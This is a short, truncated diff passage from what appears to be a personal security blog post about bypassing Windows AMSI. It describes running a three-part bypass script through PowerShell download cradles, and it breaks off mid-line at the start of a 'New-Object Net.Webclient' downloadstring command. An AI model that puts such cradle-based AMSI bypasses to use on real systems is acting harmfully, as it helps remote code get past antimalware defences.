webbie321/webbie321.github.io/_posts/2021-02-28-bypassing-AMSI-like-a-Script-Kiddie.md

 We're a bit unhappy with running our script manually, one chunk at a time on the PowerShell CLI, so we will now work on getting it all on one prompt.
 Should be more useful when we don't have access to the CLI.

-As a first option, ee save the 3 parts in different files (1/2/3), and we will run them in one go using 3 download cradles.
+As a first option, we save the 3 parts in different files (1/2/3), and we will run them in one go using 3 download cradles.
 It works.
 ```
 (New-Object Net.Webclient).downloadstring("